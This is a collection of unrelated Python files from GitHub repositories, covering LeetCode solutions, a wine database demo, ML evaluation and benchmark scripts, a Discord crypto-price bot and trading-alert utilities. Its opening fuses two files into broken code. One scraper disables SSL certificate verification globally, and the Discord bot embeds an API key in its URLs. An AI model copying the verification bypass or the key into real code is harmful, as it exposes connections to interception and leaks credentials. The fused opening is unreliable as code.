intensity(self):\n intensity_level=[]\n intensity_list = self.count_vehicle()\n #print(intensity_list)\n for i,ints in enumerate(intensity_list):\n if ints<=2:\n intensity_level = np.append(intensity_level, 0)\n elif 2 List[List[int]]:\n self.ans = []\n path = []\n self.dfs(sorted(nums), path)\n\n return self.ans\n\n def dfs(self, nums: List[int], path: List[int]):\n if not nums:\n self.ans.append(path)\n\n for i in range(len(nums)):\n if i != 0 and nums[i - 1] == nums[i]:\n continue\n self.dfs(nums[:i] + nums[i + 1 :], path + [nums[i]])\n","repo_name":"jerrt2003/leetcode-in-python","sub_path":"47_Permutations_II/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18913205778","text":"from datetime import datetime\n\nfrom ..database.queryDB import QueryDB\nfrom ..database.regiontableDB import RegionTableDB\nfrom ..database.winetableDB import 
WineTableDB\nfrom .datastructures import Region, Review, Vintage, Websites, Wine\n\nregion1 = Region(\n \"St Julien\",\n \"Bordeaux - Left Bank\",\n \"France\",\n)\n\nregion2 = Region(\n \"Pauillac\",\n \"Bordeaux - Left Bank\",\n \"France\",\n)\n\n# TODO Link region table to wine table and do a fetch\n\nregiontable = RegionTableDB()\nregiontable.insert(region1)\nregiontable.insert(region2)\n\nregiontable.print_all_rows()\n\nregiontable.amend_subregion_spelling(\"Pauillac\", \"Pauylac\")\nregiontable.print_all_rows()\n\nwine1 = Wine(\n \"Château Grand-Puy-Lacoste\",\n \"Red\",\n \"France\",\n \"Bordeaux - Left Bank\",\n \"Pauillac\",\n \"Cabernet Sauvignon & Merlot\",\n)\n\nwine2 = Wine(\n \"Château Gloria\",\n \"Red\",\n \"France\",\n \"Bordeaux\",\n \"Paulliac\",\n \"Cab Sav\",\n)\nwine3 = Wine(\n \"Château Margaux\",\n \"White\",\n \"France\",\n \"Bordeaux\",\n \"St Julien\",\n \"Cab Sav\",\n)\n\nwine4 = Wine(\n \"Château Grand-Puy-Lacoste\",\n \"Orange\",\n \"France\",\n \"Bordeaux - Left Bank\",\n \"Pauillac\",\n \"Cabernet Sauvignon & Merlot\",\n)\n\nwinetable = WineTableDB()\nwinetable.insert(wine1)\nwinetable.insert(wine2)\nwinetable.insert(wine3)\nwinetable.insert(wine4)\n\nquery = QueryDB()\n\nwines = query.fetch_by_colour(\"Red\")\nprint(\"Fetch reds\")\nfor wine in wines:\n print(wine)\nprint(\"*\" * 15)\n\nwinetable.update_colour(1, \"Blue\")\n\nwines = query.fetch_by_colour(\"Blue\")\nprint(\"Colour change\")\nfor wine in wines:\n print(wine)\nprint(\"*\" * 15)\n\nwines = query.fetch_by_country_and_name_and_reverse_colour_order(\"France\")\nprint(\n \"Name and reverse colour order\"\n) # No need for sort index in transactions application?\nfor wine in wines:\n print(wine)\nprint(\"*\" * 15)\n\nprint(\"Print all rows\")\nwinetable.print_all_rows()\nprint(\"*\" * 15)\n\nwinetable.delete(1)\n# Best to use rowid if you are deleting or updating a record - this is its unique identifier - no need to wineID etc\nprint(\"Deleted record 1 - reprint all rows\")\nwinetable.print_all_rows()\nprint(\"*\" * 15)\n\nwines = query.fetch_by_colour(\"White\")\nprint(\"Fetch whites\")\nfor wine in wines:\n print(wine)\nprint(\"*\" * 15)\n\n\nvintage1 = Vintage(\n \"ID00001\",\n 2018,\n \"BBR\",\n \"BBR\",\n \"In Bond\",\n 75,\n 6,\n 2,\n 279.96,\n \"ID00001.01\",\n 0,\n \"Post-release\",\n datetime(2023, 1, 4, 0, 0),\n datetime(2023, 1, 4, 0, 0),\n)\n\nreview1 = Review(\n \"ID00001\",\n \"\"\"The 2018 Grand-Puy-Lacoste is fabulous, just as it was from barrel. Strong \\\nCabernet inflections soar out of the glass, giving the wine a compelling \\\naromatic profile laced with the essence of graphite, dried herbs, menthol \\\nand dark fruit. One of the most classic (for lack of a better word) wines \\\nin the Left Bank in 2018, Grand-Puy-Lacoste is super-impressive right out \\\nof the gate. Grand-Puy-Lacoste is ultimately a wine of tremendous class \\\nthat remains restrained and aristocratic in breeding. 
Don't miss it.\n \"\"\",\n \"96\",\n \"Antonio Galloni\",\n \"2028 - 2048\",\n \"1st March 2021\",\n)\n\n\nweb1 = Websites(\n \"ID00001\",\n \"cellartracker\",\n \"winesearcher\",\n)\n","repo_name":"ClangerBite/Wines","sub_path":"Wines/src/core/loaddata.py","file_name":"loaddata.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"73676379049","text":"from urllib.request import Request,urlopen\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\n# Python 3 verifies SSL certificates on https requests by default, so verification needs to be disabled here\nheaders = {\n 'User-Agent':'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25'\n}\n\nreq = Request('http://www.douban.com/',headers=headers)\n\nres = urlopen(req)\nprint(res.read().decode('utf-8'))","repo_name":"wangquan1024/webSpider","sub_path":"urilib/demo3.py","file_name":"demo3.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"32113248217","text":"class PrefixMiddleware:\n \"\"\"Create global prefix middleware\"\"\"\n\n # NOTE test note here\n def __init__(self, app, prefix=\"\"):\n self.app = app\n self.prefix = prefix\n\n def __call__(self, environ, start_response):\n if environ[\"PATH_INFO\"].startswith(self.prefix):\n environ[\"PATH_INFO\"] = environ[\"PATH_INFO\"][len(self.prefix) :]\n environ[\"SCRIPT_NAME\"] = self.prefix\n return self.app(environ, start_response)\n else:\n start_response(\"200\", [(\"Content-Type\", \"application/json\")])\n return [\n \"\"\"{msg: please prefix all routes with /api \n to correctly route requests}\"\"\".encode()\n ]\n","repo_name":"anish-sinha1/jen","sub_path":"server/app/middleware/prefix.py","file_name":"prefix.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"6207170897","text":"# LeetCode 32\n# Longest Valid Parentheses\n# Dynamic Programming\n\nfrom typing import List\n\nclass Solution:\n def longestValidParentheses(self, s: str) -> int:\n if len(s) < 2:\n return 0\n dp = [0] * len(s)\n dp[0], dp[1] = 0, 2 if s[0:2] == \"()\" else 0\n for i in range(2, len(s)):\n if s[i] == \"(\": # ...(\n dp[i] = 0\n elif s[i - 1] == \"(\": # ...()\n dp[i] = dp[i - 2] + 2\n elif i - dp[i - 1] - 1 >= 0 and s[i - dp[i - 1] - 1] == \"(\": # ..((...))\n dp[i] = dp[i - 1] + 2\n if i - dp[i - 1] - 2 >= 0:\n dp[i] = dp[i] + dp[i - dp[i - 1] - 2]\n return max(dp)\n\nif __name__ == \"__main__\":\n print(Solution().longestValidParentheses(\"(()\"))\n print(Solution().longestValidParentheses(\")()())\"))\n print(Solution().longestValidParentheses(\"\"))\n print(Solution().longestValidParentheses(\"(()))()\"))","repo_name":"David-Xiang/Online-Judge-Solutions","sub_path":"210722/LC32.py","file_name":"LC32.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"34955827669","text":"import numpy as np\nimport torch\nimport os\nimport random\nimport argparse\nfrom tqdm import tqdm\nfrom sklearn.metrics import classification_report\n\nfrom data.dataset import ShapeDataset\nfrom models.transformer_base import PCTransformer\n\n\ndef run_model(model, dataloader, device):\n model.eval()\n y_true = []\n y_pred = []\n with torch.no_grad():\n for i, data in 
tqdm(enumerate(dataloader)):\n pc, y = data[0].to(device), data[1].to(device)\n logits = model(pc)\n y_true += y.data.cpu().numpy().tolist()\n y_pred += torch.argmax(logits, dim=1).data.cpu().numpy().tolist()\n print('Classification report for {} set'.format(dataloader.dataset.phase))\n target_names = list(dataloader.dataset.class_map.keys())\n print(classification_report(y_true, y_pred, target_names=target_names))\n\n\ndef test(args):\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n dataset_t = ShapeDataset('test', args)\n dataloader_t = torch.utils.data.DataLoader(dataset_t,\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.num_workers,\n drop_last=False,\n pin_memory=torch.cuda.is_available()\n )\n dataset_v = ShapeDataset('valid', args)\n dataloader_v = torch.utils.data.DataLoader(dataset_v,\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.num_workers,\n drop_last=False,\n pin_memory=torch.cuda.is_available()\n )\n\n model = PCTransformer(args)\n checkpoint = torch.load(args.weights_path, map_location='cpu')\n model.load_state_dict(checkpoint['model_state_dict'])\n model.to(device)\n run_model(model, dataloader_t, device)\n run_model(model, dataloader_v, device)\n\n\nif __name__ == \"__main__\":\n args = argparse.Namespace(\n seed=111,\n num_workers=4,\n data_path='./dataset-v2',\n weights_path='./last.pt',\n num_cls=6,\n n_points_mesh=25000,\n n_points_batch=1024,\n batch_size=110,\n hid_dim=128,\n nhead=2,\n dropout=0.4,\n dim_fc=1024,\n n_attn=4,\n )\n seed_value = args.seed\n os.environ['PYTHONHASHSEED'] = str(seed_value)\n torch.manual_seed(seed_value)\n torch.cuda.manual_seed_all(seed_value)\n random.seed(seed_value)\n np.random.seed(seed_value)\n\n test(args)\n","repo_name":"maxs-kan/phygitalism_tasks","sub_path":"task3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"29536456824","text":"from django.conf.urls import url\n\nfrom . 
import auth, views\n\napp_name = 'main'\nurlpatterns = [\n url(r'^register/$', auth.RegisterFormView.as_view()),\n url(r'^login/$', auth.LoginFormView.as_view()),\n url(r'^logout/$', auth.LogoutView.as_view()),\n url(r'^$', views.index, name=\"index\"),\n url(r'^record/new$', views.record_new, name=\"record_new\"),\n url(r'^record/(?P[0-9]+)$', views.one_record, name='one_record'),\n url(r'^user/(?P[0-9]+)$', views.user_records, name='user_records'),\n]\n","repo_name":"alekseyivashin/django_blog","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1206299501","text":"import discord\nimport json\nimport urllib.request\nimport config as cfg \t\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n\tprint('We have logged in as {0.user}'.format(client))\n@client.event\nasync def on_message(message):\n\tif message.author == client.user:\n\t\treturn\n\n\tif message.content.startswith('crypto'):\n\t\tif message.content == \"crypto help\":\n\t\t\tembed = discord.Embed(title=\"Help\",description=\"some useful commands\")\n\t\t\tembed.add_field(name=\"crypto btc\", value=\"Returns The Price of Bitcoin.\")\n\t\t\tembed.add_field(name=\"crypto eth\", value=\"Returns The Price of Ethereum\")\n\t\t\tembed.add_field(name=\"crypto xrp\", value=\"Returns The Price of Ripple\")\n\t\t\tembed.add_field(name=\"crypto xlm\", value=\"Returns The Price of Stellar\")\n\t\t\tembed.add_field(name=\"crypto xmr\", value=\"Returns The Price of Monero\")\n\t\t\tembed.add_field(name=\"crypto rep\", value=\"Returns The Price of Augur\")\n\t\t\tembed.add_field(name=\"crypto dash\", value=\"Returns The Price of Dash\")\n\t\t\tembed.add_field(name=\"crypto top10 volume\", value=\"Returns The Top 10 Cryptocurrencies(Volume)\")\n\t\t\tawait message.channel.send(content=None, embed=embed)\n\t\telif message.content == \"crypto btc\":\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464&ids=BTC&interval=1d,30d&convert=USD\"\n\t\t\tdata = json.loads(urllib.request.urlopen(url).read())\n\t\t\t\n\t\t\tawait message.channel.send('Rank: ' + data[0]['rank']+ '\\nName: ' + data[0]['name'] + '\\nSymbol: ' + data[0]['symbol'] +'\\nPrice: ' +data[0]['price'] + ' Dollars')\n\t\telif message.content == \"crypto eth\":\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464&ids=ETH&interval=1d,30d&convert=USD\"\n\t\t\tdata = json.loads(urllib.request.urlopen(url).read())\n\t\t\t\n\t\t\tawait message.channel.send('Rank: ' + data[0]['rank']+ '\\nName: ' + data[0]['name'] + '\\nSymbol: ' + data[0]['symbol'] +'\\nPrice: ' +data[0]['price'] + ' Dollars')\n\t\telif message.content == \"crypto xrp\":\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464&ids=XRP&interval=1d,30d&convert=USD\"\n\t\t\tdata = json.loads(urllib.request.urlopen(url).read())\n\t\t\t\n\t\t\tawait message.channel.send('Rank: ' + data[0]['rank']+ '\\nName: ' + data[0]['name'] + '\\nSymbol: ' + data[0]['symbol'] +'\\nPrice: ' +data[0]['price'] + ' Dollars')\n\t\telif message.content == \"crypto xlm\":\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464&ids=XLM&interval=1d,30d&convert=USD\"\n\t\t\tdata = json.loads(urllib.request.urlopen(url).read())\n\t\t\t\n\t\t\tawait message.channel.send('Rank: ' + data[0]['rank']+ '\\nName: ' + data[0]['name'] + 
'\\nSymbol: ' + data[0]['symbol'] +'\\nPrice: ' +data[0]['price'] + ' Dollars')\n\t\telif message.content == \"crypto xmr\":\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464&ids=XMR&interval=1d,30d&convert=USD\"\n\t\t\tdata = json.loads(urllib.request.urlopen(url).read())\n\t\t\t\n\t\t\tawait message.channel.send('Rank: ' + data[0]['rank']+ '\\nName: ' + data[0]['name'] + '\\nSymbol: ' + data[0]['symbol'] +'\\nPrice: ' +data[0]['price'] + ' Dollars')\n\t\telif message.content == \"crypto rep\":\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464&ids=REP&interval=1d,30d&convert=USD\"\n\t\t\tdata = json.loads(urllib.request.urlopen(url).read())\n\t\t\t\n\t\t\tawait message.channel.send('Rank: ' + data[0]['rank']+ '\\nName: ' + data[0]['name'] + '\\nSymbol: ' + data[0]['symbol'] +'\\nPrice: ' +data[0]['price'] + ' Dollars')\n\t\telif message.content == \"crypto dash\":\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464&ids=DASH&interval=1d,30d&convert=USD\"\n\t\t\tdata = json.loads(urllib.request.urlopen(url).read())\n\t\t\t\n\t\t\tawait message.channel.send('Rank: ' + data[0]['rank']+ '\\nName: ' + data[0]['name'] + '\\nSymbol: ' + data[0]['symbol'] +'\\nPrice: ' +data[0]['price'] + ' Dollars')\n\t\telif message.content == \"crypto top10 volume\":\n\t\t\tawait message.channel.send('Please wait for Computation to occur!')\n\t\t\turl = \"https://api.nomics.com/v1/currencies/ticker?key=09a28f4136aef7b18df8880d88838464\"\n\t\t\tdata=json.loads(urllib.request.urlopen(url).read())\n\t\t\ttop_10_names = [x[\"name\"] for x in data[:10]]\n\t\t\ttop_10_price = [x[\"price\"] for x in data[:10]]\n\t\t\tembed = discord.Embed(title=\"Ranking of Cryptocurrencies(Volume)\",description=\"\")\n\t\t\tembed.add_field(name=\"1.\", value=top_10_names[0]+\"\\nValue: \"+top_10_price[0]+\"$\")\n\t\t\tembed.add_field(name=\"2.\", value=top_10_names[1]+\"\\nValue: \"+top_10_price[1]+\"$\")\n\t\t\tembed.add_field(name=\"3.\", value=top_10_names[2]+\"\\nValue: \"+top_10_price[2]+\"$\")\n\t\t\tembed.add_field(name=\"4.\", value=top_10_names[3]+\"\\nValue: \"+top_10_price[3]+\"$\")\n\t\t\tembed.add_field(name=\"5.\", value=top_10_names[4]+\"\\nValue: \"+top_10_price[4]+\"$\")\n\t\t\tembed.add_field(name=\"6.\", value=top_10_names[5]+\"\\nValue: \"+top_10_price[5]+\"$\")\n\t\t\tembed.add_field(name=\"7.\", value=top_10_names[6]+\"\\nValue: \"+top_10_price[6]+\"$\")\n\t\t\tembed.add_field(name=\"8.\", value=top_10_names[7]+\"\\nValue: \"+top_10_price[7]+\"$\")\n\t\t\tembed.add_field(name=\"9.\", value=top_10_names[8]+\"\\nValue: \"+top_10_price[8]+\"$\")\n\t\t\tembed.add_field(name=\"10.\", value=top_10_names[9]+\"\\nValue: \"+top_10_price[9]+\"$\")\n\t\t\tawait message.channel.send(content=None, embed=embed)\n\n\t\telse:\n\t\t\tawait message.channel.send('Unknown Command,\\nPlease refer to \"crypto help\" for more information!')\t\n\nclient.run(cfg.myToken[\"token\"])","repo_name":"rymnc/crypto-discord-bot","sub_path":"script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":5400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21946689119","text":"import math\nfrom dataclasses import dataclass, asdict\nfrom datetime import datetime\nfrom typing import Optional\n\nimport pytz\nfrom bson import ObjectId\n\nfrom src.auxiliary import db\nfrom src.auxiliary.stopwatch import Stopwatch\n\n\n@dataclass\nclass 
SubmittedForm:\n chat_id: int\n person_type: str\n name: str\n age: int\n contact_means: str\n contact: str\n\n consultation_preference: Optional[str] = None\n _id: Optional[ObjectId] = None\n\n # Stamped at save time: a datetime.now() default here would be evaluated\n # once at class definition and shared by every instance.\n submission_time: Optional[str] = None\n\n\ndef save_submission(submission: SubmittedForm):\n if submission.submission_time is None:\n submission.submission_time = datetime.now(tz=pytz.UTC).isoformat()\n with Stopwatch('save_submission'):\n with db.get_db_client() as client:\n client[db.DB_NAME][db.SUBMITTED_FORM_DATA_NAME].insert_one(asdict(submission))\n\n\ndef get_all_submitted_forms():\n with db.get_db_client() as client:\n items = client[db.DB_NAME][db.SUBMITTED_FORM_DATA_NAME].find({})\n\n for item in items:\n for k, v in item.items():\n if type(item[k]) == float and math.isnan(item[k]):\n item[k] = ''\n\n yield {\n 'id': str(item['_id']),\n 'person_type': str(item['person_type']),\n 'name': str(item['name']),\n 'age': int(item['age']),\n 'contact_means': str(item['contact_means']),\n 'contact': str(item['contact']),\n 'consultation_preference': str(item['consultation_preference']),\n 'submission_time': str(item['submission_time'])\n }\n\n\ndef any_key(some_dict: dict):\n if some_dict is None:\n return None\n\n return list(some_dict.values())[0]\n","repo_name":"TermanEmil/psychologist_finder_bot","sub_path":"src/SubmittedForm.py","file_name":"SubmittedForm.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"26180665797","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom absl import app\nfrom absl import flags\nimport time\nimport os\n\nimport tensorflow as tf\ntf.compat.v1.disable_eager_execution()\n\n\nFLAGS = flags.FLAGS\nflags.DEFINE_string(\"data_files_pattern\", \"gs://cloud-samples-data/ai-platform/fake_imagenet/train*\",\n \"TFRecords input pattern.\")\nflags.DEFINE_integer(\"num_iterations\", 1000, \"Number of batches to load.\")\nflags.DEFINE_integer(\"cycle_length\", 20, \"cycle_length parameter for parallel_interleave\")\n\ndef input_fn(data_files_pattern,\n batch_size,\n num_iterations=1):\n filenames = tf.io.gfile.glob(data_files_pattern)\n dataset = tf.data.Dataset.from_tensor_slices(filenames).repeat()\n\n def _read_fn(f):\n return tf.data.TFRecordDataset(f)\n\n dataset = dataset.apply(tf.data.experimental.parallel_interleave(\n map_func=_read_fn,\n cycle_length=FLAGS.cycle_length,\n block_length=1,\n sloppy=True,\n buffer_output_elements=50000,\n prefetch_input_elements=40))\n dataset = dataset.batch(batch_size, drop_remainder=False)\n dataset = dataset.prefetch(5)\n return dataset\n\n\ndef run_benchmark(_):\n num_iterations = FLAGS.num_iterations\n batch_size = 2048\n print('started')\n dataset = input_fn(\n data_files_pattern=FLAGS.data_files_pattern,\n batch_size=batch_size)\n itr = tf.compat.v1.data.make_one_shot_iterator(dataset)\n size = tf.shape(itr.get_next())[0]\n with tf.compat.v1.Session() as sess:\n size_callable = sess.make_callable(size)\n start = time.time()\n n = 0\n mini_batch = 100\n for i in range(num_iterations // mini_batch):\n local_start = time.time()\n start_n = n\n for j in range(mini_batch):\n n += size_callable()\n local_end = time.time()\n print('Processed %d entries in %f seconds. [%f] examples/s' % (\n n - start_n, local_end - local_start,\n (mini_batch * batch_size) / (local_end - local_start)))\n end = time.time()\n print('Processed %d entries in %f seconds. 
[%f] examples/s' % (\n n, end - start,\n n / (end - start)))\n\n\nif __name__ == '__main__':\n app.run(run_benchmark)\n","repo_name":"vlasenkoalexey/bigquery_perftest","sub_path":"gcs_perftest.py","file_name":"gcs_perftest.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15642429293","text":"import json\nimport datetime\nfrom urllib.request import urlopen, Request\nimport time\nfrom api_keys import coinigykey, coinigysec\n\n\nclass AlertManager:\n def __init__(self, coinigikey, coinigysec, print_output=True):\n \"\"\"\n Object used to manage coinigy alerts\n :param coinigikey: string, coinigy key\n :param coinigysec: string, coinigy secret\n \"\"\"\n self.coinigykey = coinigykey\n self.coinigysec = coinigysec\n self.print_output = print_output\n\n @staticmethod\n def _get_old_alerts():\n # get old alerts\n headers = {'Content-Type': 'application/json', 'X-API-KEY': coinigykey, 'X-API-SECRET': coinigysec}\n values = '{\"exch_code\": \"BTRX\"}'\n values = bytes(values, encoding='utf-8')\n request = Request('https://api.coinigy.com/api/v1/alerts', data=values, headers=headers)\n old_alerts = urlopen(request).read()\n old_alerts = old_alerts.decode(\"utf-8\")\n old_alerts = json.loads(old_alerts)\n return old_alerts\n\n @staticmethod\n def _api_delete_alert(alert_id):\n \"\"\"\n Api call to delete alert\n :param alert_id: srting, id of the alert to delete\n :return:\n \"\"\"\n body = '{\"alert_id\": ' + alert_id + '}'\n body = bytes(body, encoding='utf-8')\n headers = {'Content-Type': 'application/json', 'X-API-KEY': coinigykey, 'X-API-SECRET': coinigysec}\n request = Request('https://api.coinigy.com/api/v1/deleteAlert', data=body, headers=headers)\n response_body = urlopen(request).read()\n time.sleep(1)\n return response_body\n\n def delete_alerts_newer_than(self, newer_than):\n \"\"\"\n Deletes all alerts created after 'newer_than'\n :param newer_than: datetime object\n :return:\n \"\"\"\n\n old_alerts = self._get_old_alerts()\n\n for alert in old_alerts['data']['open_alerts']:\n if datetime.datetime.strptime(alert['alert_added'], '%Y-%m-%d %H:%M:%S') > newer_than:\n resp_body = self._api_delete_alert(alert['alert_id'])\n if self.print_output:\n print(resp_body)\n\n def delete_scanner_alerts(self):\n \"\"\"\n Deletes all alerts created by the scanner\n :return:\n \"\"\"\n\n old_alerts = self._get_old_alerts()\n\n for alert in old_alerts['data']['open_alerts']:\n if \"z_base_scanner\" in alert['alert_note']:\n resp_body = self._api_delete_alert(alert['alert_id'])\n if self.print_output:\n print(resp_body)\n\nif __name__ == \"__main__\":\n ##############VARIABLES TO SET\n from_date = datetime.datetime(year=2017, month=12, day=1, hour=23)\n ##############VARIABLES TO SET\n\n alerts = AlertManager(coinigykey, coinigysec)\n\n alerts.delete_alerts_newer_than(from_date)","repo_name":"payala/trading-scripts","sub_path":"z_manage_alerts.py","file_name":"z_manage_alerts.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70835686248","text":"__all__ = ['get_statement_essentials', 'get_relation_dict',\n 'export_relation_dict_to_tsv']\n\nimport logging\nfrom itertools import permutations\nfrom sqlalchemy import or_\n\nfrom indra.databases import hgnc_client\nfrom indra_db.util import get_db, get_statement_object\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_statement_essentials(clauses, 
count=1000, db=None, preassembled=True):\n \"\"\"Get the type, agents, and id data for the specified statements.\n\n This function is useful for light-weight searches of basic mechanistic\n information, without the need to follow as many links in the database to\n populate the Statement objects.\n\n To get full statements, use `get_statements`.\n\n Parameters\n ----------\n clauses : list\n list of sqlalchemy WHERE clauses to pass to the filter query.\n count : int\n Number of statements to retrieve and process in each batch.\n db : :py:class:`DatabaseManager`\n Optionally specify a database manager that attaches to something\n besides the primary database, for example a local database instance.\n preassembled : bool\n If true, statements will be selected from the table of pre-assembled\n statements. Otherwise, they will be selected from the raw statements.\n Default is True.\n\n Returns\n -------\n A list of tuples containing:\n `(uuid, sid, hash, type, (agent_1, agent_2, ...))`.\n \"\"\"\n if db is None:\n db = get_db('primary')\n\n stmts_tblname = 'pa_statements' if preassembled else 'raw_statements'\n\n stmt_data = []\n db_stmts = db.select_all(stmts_tblname, *clauses, yield_per=count)\n for db_stmt in db_stmts:\n stmt = get_statement_object(db_stmt)\n sid = db_stmt.id if hasattr(db_stmt, 'id') else None\n stmt_data.append((db_stmt.uuid, sid, stmt.get_hash(shallow=True),\n db_stmt.type, stmt.agent_list()))\n\n return stmt_data\n\n\ndef get_relation_dict(db, groundings=None, with_evidence_count=False,\n with_support_count=False):\n \"\"\"Get a dictionary of entity interactions from the database.\n\n Use only metadata from the database to rapidly get simple interaction data.\n This is much faster than handling the full Statement jsons, while providing\n some basic valuable functionality.\n\n Parameters\n ----------\n db : DatabaseManager instance\n An instance of a database manager.\n groundings : list[str] or None\n Select which types of grounding namespaces to include, e.g. HGNC, or\n FPLX, or both. Only agent refs with these groundings will be selected.\n If None, only HGNC is used.\n with_evidence_count : bool\n Default is False. If True, an additional query will be made for each\n statement to get the count of supporting evidence, which is a useful\n proxy for belief.\n with_support_count : bool\n Default is False. 
Like `with_evidence_count`, except the number of\n supporting statements is counted.\n \"\"\"\n other_params = []\n if groundings is None:\n other_params.append(db.PAAgents.db_name.like('HGNC'))\n elif len(groundings) == 1:\n other_params.append(db.PAAgents.db_name.like(groundings[0]))\n else:\n ors = []\n for gdng in groundings:\n ors.append(db.PAAgents.db_name.like(gdng))\n other_params.append(or_(*ors))\n\n vals = [db.PAAgents.id, db.PAAgents.db_id, db.PAAgents.role,\n db.PAAgents.db_name, db.PAStatements.type, db.PAStatements.mk_hash]\n\n if with_evidence_count:\n other_params.append(\n db.EvidenceCounts.mk_hash == db.PAStatements.mk_hash\n )\n vals.append(db.EvidenceCounts.ev_count)\n\n # Query the database\n results = db.select_all(\n vals,\n db.PAStatements.mk_hash == db.PAAgents.stmt_mk_hash,\n *other_params, **{'yield_per': 10000}\n )\n\n # Sort into a dict.\n stmt_dict = {}\n for res in results:\n if with_evidence_count:\n ag_id, ag_dbid, ag_role, ag_dbname, st_type, stmt_hash, n_ev = res\n else:\n ag_id, ag_dbid, ag_role, ag_dbname, st_type, stmt_hash = res\n\n # Handle the case that this is or isn't HGNC\n if ag_dbname == 'HGNC':\n ag_tpl = (ag_id, ag_role, ag_dbname, ag_dbid,\n hgnc_client.get_hgnc_name(ag_dbid))\n else:\n ag_tpl = (ag_id, ag_role, ag_dbname, ag_dbid, ag_dbid)\n\n # Add the tuple to the dict in the appropriate manner.\n if stmt_hash not in stmt_dict.keys():\n stmt_dict[stmt_hash] = {'type': st_type, 'agents': [ag_tpl]}\n if with_evidence_count:\n stmt_dict[stmt_hash]['n_ev'] = n_ev\n if with_support_count:\n logger.info('Getting a count of support for %d' % stmt_hash)\n n_sup = db.count(\n db.PASupportLinks,\n db.PASupportLinks.supported_mk_hash == stmt_hash\n )\n stmt_dict[stmt_hash]['n_sup'] = n_sup\n else:\n assert stmt_dict[stmt_hash]['type'] == st_type\n stmt_dict[stmt_hash]['agents'].append(ag_tpl)\n\n # Only return the entries with at least 2 agents.\n return {k: d for k, d in stmt_dict.items() if len(d['agents']) >= 2}\n\n\ndef export_relation_dict_to_tsv(relation_dict, out_base, out_types=None):\n \"\"\"Export a relation dict (from get_relation_dict) to a tsv.\n\n Available output types are:\n\n - \"full_tsv\" : get a tsv with directed pairs of entities (e.g. HGNC\n symbols), the type of relation (e.g. Phosphorylation) and the hash\n of the preassembled statement. Columns are agent_1, agent_2 (where\n agent_1 affects agent_2), type, hash.\n - \"short_tsv\" : like the above, but without the hashes, so only one\n instance of each pair and type trio occurs. However, the information\n cannot be traced. Columns are agent_1, agent_2, type, where agent_1\n affects agent_2.\n - \"pairs_tsv\" : like the above, but without the relation type. Similarly,\n each row is unique. In addition, the agents are undirected. Thus this\n is purely a list of pairs of related entities. The columns are just\n agent_1 and agent_2, where nothing is implied by the ordering.\n\n Parameters\n ----------\n relation_dict : dict\n This should be the output from `get_relation_dict`, or something\n equivalently constructed.\n out_base : str\n The base-name for the output files.\n out_types : list[str]\n A list of the types of tsv to output. See above for details.\n \"\"\"\n # Check to make sure the output types are valid.\n ok_types = ['full_tsv', 'short_tsv', 'pairs_tsv']\n if out_types is None:\n out_types = ok_types[:]\n\n if any(ot not in ok_types for ot in out_types):\n raise ValueError('Invalid output_types: %s. 
